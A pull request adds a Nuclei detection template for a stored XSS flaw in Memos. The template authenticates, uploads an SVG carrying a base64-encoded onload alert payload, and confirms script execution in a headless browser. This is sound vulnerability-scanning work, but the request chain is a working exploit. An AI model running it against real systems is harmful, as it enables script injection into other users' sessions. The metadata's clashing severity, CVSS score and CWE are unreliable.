### PR TITLE
feat: add CVE-2025-50738 template for stored XSS vulnerability in Memos

### DIFF
--- a/headless/cves/2025/CVE-2025-50738.yaml
+++ b/headless/cves/2025/CVE-2025-50738.yaml
@@ -1,0 +1,81 @@
+id: CVE-2025-50738
+
+info:
+  name: Memos < 0.25.0 - Stored XSS via SVG File Upload (Fixed Matcher)
+  author: (SeongHyeon Jeon)nukunga
+  severity: medium
+  description: |
+    An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
+  reference:
+    - https://github.com/usememos/memos/issues/4707
+    - https://github.com/advisories/GHSA-hfcf-79gh-f3jc
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-50738
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
+    cvss-score: 9.8
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    max-request: 2
+  tags: xss,stored-xss,memos,authenticated,ghsa,intrusive,headless
+
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+  filename: "{{rand_base(8)}}"
+
+http:
+  - raw:
+      - |
+        POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+    extractors:
+      - type: regex
+        part: header
+        name: access_token
+        internal: true
+        group: 1
+        regex:
+          - 'memos\.access-token=([^;]+);'
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/resources"
+    headers:
+      Cookie: "memos.access-token={{access_token}}"
+      Content-Type: "application/json"
+    body: |
+      {
+        "filename": "{{filename}}.svg",
+        "content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
+        "type": "image/svg+xml"
+      }
+
+    extractors:
+      - type: regex
+        name: resource_id
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '"name":"resources/([A-Za-z0-9]+)"'
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{BaseURL}}/file/resources/{{resource_id}}/{{filename}}.svg"
+
+      - action: waitdialog
+        name: xss_alert
+
+    matchers:
+      - type: dsl
+        dsl:
+          - xss_alert == true
+          - xss_alert_message == "1"
+          - xss_alert_type == "alert"
+        condition: and


### PR DESCRIPTION
### Template / PR Information
<img width="1214" height="284" alt="image" src="https://github.com/user-attachments/assets/495ce658-d9d7-4b31-8722-362b2747999a" />

I used docker image Memos/0.24.3.
If you want to test this template, you have to make first account

https://hub.docker.com/layers/neosmemo/memos/0.24.3/images/sha256-2800e0b9d20140e23beb166fa20264241ba7af620bc030c8bee7dabe3049f8a0


- Added CVE-2025-50738
- References:
1. https://github.com/usememos/memos/issues/4707
2. https://nvd.nist.gov/vuln/detail/CVE-2025-50738


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)